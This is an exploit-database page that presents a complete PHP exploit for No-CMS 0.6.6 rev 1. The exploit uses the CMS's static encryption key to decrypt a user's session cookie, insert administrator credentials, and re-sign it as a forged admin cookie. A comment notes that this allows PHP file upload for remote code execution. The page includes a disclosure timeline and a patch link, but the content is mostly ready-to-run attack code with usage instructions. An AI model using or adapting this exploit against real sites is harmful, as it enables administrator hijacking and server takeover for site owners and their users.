0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
No-CMS 0.6.6 rev 1 - Admin Account Hijacking / RCE Exploit via Static Encryption Key
<?php /* * * Static encryption_key of No-CMS lead to Session Array Injection in order to * hijack administrator account then you will be able for upload php files to * server via theme/module upload. * * This exploit generates cookie for administrator access from non-privileges cookie. * * Full analysis can be found following link. * http://www.mehmetince.net/codeigniter-based-no-cms-admin-account-hijacking-rce-via-static-encryption-key/ * * TIMELINE * * Apr 21, 2014 at 20:17 PM = Vulnerability found. * Apr 22, 2014 at 1:27 AM = First contact with no-cms developers. * Apr 22, 2014 at 1:31 AM = Response from no-cms developer. * Apr 22, 2014 at 2:29AM = Vulnerability confirmed by developers. * Apr 22, 2014 at 04:37 = Vulnerability has been patch via following commit. * https://github.com/goFrendiAsgard/No-CMS/commit/39d6ed327330e94b7a76a04042665dd13f2162bd */ define('KEY', 'namidanoregret'); define('KEYWORD', 'session_id'); function log_message($type = 'debug', $str){ echo PHP_EOL."[".$type."] ".$str; } function show_error($str){ echo PHP_EOL."[error] ".$str.PHP_EOL; exit(0); } function _print($str){ log_message("info", $str.PHP_EOL); } class CI_Encrypt { public $encryption_key = ''; protected $_hash_type = 'sha1'; protected $_mcrypt_exists = FALSE; protected $_mcrypt_cipher; protected $_mcrypt_mode; public function __construct() { $this->_mcrypt_exists = function_exists('mcrypt_encrypt'); log_message('debug', 'Encrypt Class Initialized'); } public function get_key($key = '') { return md5($this->encryption_key); } public function set_key($key = '') { $this->encryption_key = $key; return $this; } public function encode_from_legacy($string, $legacy_mode = MCRYPT_MODE_ECB, $key = '') { if ($this->_mcrypt_exists === FALSE) { log_message('error', 'Encoding from legacy is available only when Mcrypt is in use.'); return FALSE; } elseif (preg_match('/[^a-zA-Z0-9\/\+=]/', $string)) { return FALSE; } $current_mode = $this->_get_mode(); $this->set_mode($legacy_mode); $key = $this->get_key($key); $dec = base64_decode($string); if (($dec = $this->mcrypt_decode($dec, $key)) === FALSE) { $this->set_mode($current_mode); return FALSE; } $dec = $this->_xor_decode($dec, $key); $this->set_mode($current_mode); return base64_encode($this->mcrypt_encode($dec, $key)); } public function _xor_encode($string, $key = '') { if($key === '') $key = $this->get_key(); $rand = ''; do { $rand .= mt_rand(); } while (strlen($rand) < 32); $rand = $this->hash($rand); $enc = ''; for ($i = 0, $ls = strlen($string), $lr = strlen($rand); $i < $ls; $i++) { $enc .= $rand[($i % $lr)].($rand[($i % $lr)] ^ $string[$i]); } return $this->_xor_merge($enc, $key); } public function _xor_decode($string, $key = '') { if($key === '') $key = $this->get_key(); $string = $this->_xor_merge($string, $key); $dec = ''; for ($i = 0, $l = strlen($string); $i < $l; $i++) { $dec .= ($string[$i++] ^ $string[$i]); } return $dec; } protected function _xor_merge($string, $key) { $hash = $this->hash($key); $str = ''; for ($i = 0, $ls = strlen($string), $lh = strlen($hash); $i < $ls; $i++) { $str .= $string[$i] ^ $hash[($i % $lh)]; } return $str; } public function mcrypt_encode($data, $key = '') { if($key === '') $key = $this->get_key(); $init_size = mcrypt_get_iv_size($this->_get_cipher(), $this->_get_mode()); $init_vect = mcrypt_create_iv($init_size, MCRYPT_RAND); return $this->_add_cipher_noise($init_vect.mcrypt_encrypt($this->_get_cipher(), $key, $data, $this->_get_mode(), $init_vect), $key); } public function mcrypt_decode($data, $key = '') { if($key === '') $key = $this->get_key(); $data = $this->_remove_cipher_noise($data, $key); $init_size = mcrypt_get_iv_size($this->_get_cipher(), $this->_get_mode()); if ($init_size > strlen($data)) { return FALSE; } $init_vect = substr($data, 0, $init_size); $data = substr($data, $init_size); return rtrim(mcrypt_decrypt($this->_get_cipher(), $key, $data, $this->_get_mode(), $init_vect), "\0"); } protected function _add_cipher_noise($data, $key) { $key = $this->hash($key); $str = ''; for ($i = 0, $j = 0, $ld = strlen($data), $lk = strlen($key); $i < $ld; ++$i, ++$j) { if ($j >= $lk) { $j = 0; } $str .= chr((ord($data[$i]) + ord($key[$j])) % 256); } return $str; } protected function _remove_cipher_noise($data, $key) { $key = $this->hash($key); $str = ''; for ($i = 0, $j = 0, $ld = strlen($data), $lk = strlen($key); $i < $ld; ++$i, ++$j) { if ($j >= $lk) { $j = 0; } $temp = ord($data[$i]) - ord($key[$j]); if ($temp < 0) { $temp += 256; } $str .= chr($temp); } return $str; } public function set_cipher($cipher) { $this->_mcrypt_cipher = $cipher; return $this; } public function set_mode($mode) { $this->_mcrypt_mode = $mode; return $this; } protected function _get_cipher() { if ($this->_mcrypt_cipher === NULL) { return $this->_mcrypt_cipher = MCRYPT_RIJNDAEL_256; } return $this->_mcrypt_cipher; } protected function _get_mode() { if ($this->_mcrypt_mode === NULL) { return $this->_mcrypt_mode = MCRYPT_MODE_CBC; } return $this->_mcrypt_mode; } public function set_hash($type = 'sha1') { $this->_hash_type = in_array($type, hash_algos()) ? $type : 'sha1'; } public function hash($str) { return hash($this->_hash_type, $str); } } $encryption = new CI_Encrypt(); $encryption->set_key(KEY); // WRITE YOUR OWN COOKIE HERE! $cookie = rawurldecode("DZyb3lI68zh+RBNg8C4M03TEJhMR4BBMzNWA1YUampWQ6UKaiUhG48rwkdfIs9DJYNQc8pZDniflInnUrQz1FbRxueQ3NLCahBBmrTuw8Ib7OL7ycm/IbuR81WEVrWpYOnQ4Z57/w21OCyVw42TjSkXkfWfN67veJr5630eTBA03vRbvLunZ9RLEuElqNrJu/H63yibCv8fyRWNnKs56i5OuU6Dso11O49k4fhxd008WTvsGliLxiErCkWwYfGfcjUA3V2Mh9mkrLk0YEKIbt3hbNXhAnGhIVIVJURhnmibqEFUacB1gP1GnbP2fQy3NpJt317n/3/sH+jH4lM+53IY1HOJh7n/J6RU9jqMr1hdeslDxFaV7SCuB4vPuO7SScec8063aae4808b195d818d86fda1d280ebb06bd"); $len = strlen($cookie) - 40; if ($len < 0) { show_error('The session cookie was not signed.'); } // Check cookie authentication $hmac = substr($cookie, $len); $session = substr($cookie, 0, $len); if ($hmac !== hash_hmac('sha1', $session, KEY)) { show_error('The session cookie data did not match what was expected.'); } // Detect target encryption method and Decrypt session $_mcrypt = $encryption->mcrypt_decode(base64_decode($session)); $_xor = $encryption->_xor_decode(base64_decode($session)); $method = ''; $plain = ''; if (strpos($_mcrypt, KEYWORD) !== false) { _print("Encryption method is mcrypt!"); $method = 'm'; $plain = $_mcrypt; } else if (strpos($_xor, KEYWORD) !== false) { _print("Encryption method is xor!"); $method = 'x'; $plain = $_xor; } else { show_error("something went wrong."); } // Unserialize session string in order to create session array. $session = unserialize($plain); _print("Current Session Array :"); print_r($session).PHP_EOL; // Add extra fields into it $session['cms_user_name'] = 'admin'; $session['cms_user_id'] = 1; // Print out payload string. _print("Payload appended Session Array :"); print_r($session).PHP_EOL; // Serialize it $session = serialize($session); // Encrypt it with same key. if ($method === 'm') $payload = base64_encode($encryption->mcrypt_encode($session)); if ($method === 'x') $payload = base64_encode($encryption->_xor_encode($session)); // Calculation of hmac to add it end of the encrypted session string. $payload .= hash_hmac('sha1', $payload, KEY); _print("New Cookie"); _print($payload); _print("Use Tamper Data and change cookie then push F5!"); # 0day.today [2024-12-25] #